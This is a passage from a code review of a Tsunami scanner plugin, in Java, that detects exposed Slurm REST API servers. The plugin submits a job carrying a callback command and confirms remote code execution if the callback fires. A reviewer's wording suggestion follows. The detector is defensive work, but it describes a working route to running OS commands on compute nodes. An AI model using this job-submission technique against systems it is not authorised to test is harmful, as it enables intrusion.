community/detectors/slurm_exposed_rest_api/src/main/java/com/google/tsunami/plugins/detectors/rce/SlurmExposedRestApiDetector.java

```diff
@@ -0,0 +1,214 @@
+    if (!m.find()) {
+      return false;
+    }
+    String apiVersion = m.group(1);
+
+    var payload = getTsunamiCallbackHttpPayload();
+    if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) {
+      logger.atWarning().log(
+          "The Tsunami callback server is not setup for this environment, so we cannot confirm the"
+              + " RCE callback");
+      return false;
+    }
+    String cmd = payload.getPayload();
+
+    try {
+      // Submitting a slurm job
+      httpClient.send(
+          post(String.format(rootUri + "slurm/%s/job/submit", apiVersion))
+              .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build())
+              .setRequestBody(ByteString.copyFromUtf8(String.format(JOB_PAYLOAD, cmd)))
+              .build(),
+          networkService);
+    } catch (RuntimeException | IOException e) {
+      logger.atWarning().withCause(e).log("Request to target %s failed", rootUri);
+      return false;
+    }
+
+    // If there is an RCE, the execution isn't immediate
+    logger.atInfo().log("Waiting for RCE callback.");
+    Uninterruptibles.sleepUninterruptibly((Duration.ofSeconds(oobSleepDuration)));
+    if (payload.checkIfExecuted()) {
+      logger.atInfo().log("RCE payload executed!");
+      return true;
+    }
+    return false;
+  }
+
+  private Payload getTsunamiCallbackHttpPayload() {
+    try {
+      return this.payloadGenerator.generate(
+          PayloadGeneratorConfig.newBuilder()
+              .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE)
+              .setInterpretationEnvironment(
+                  PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+              .setExecutionEnvironment(
+                  PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+              .build());
+    } catch (NotImplementedException n) {
+      return null;
+    }
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(
+                    VulnerabilityId.newBuilder()
+                        .setPublisher("TSUNAMI_COMMUNITY")
+                        .setValue("SlurmExposedRestApi"))
+                .setSeverity(Severity.CRITICAL)
+                .setTitle("Exposed Slurm REST API Server")
+                .setDescription(
+                    "Exposed slurm rest api servers Can be exploited by attackers to submit a job and "
+                        + "therefore execute arbitrary OS-level commands on slurm compute nodes")
```

Comment:
```suggestion
                    "An exposed Slurm REST API server can be exploited by attackers to submit a job and "
                        + "therefore execute arbitrary OS-level commands on Slurm compute nodes")
```
Capitalization and better wording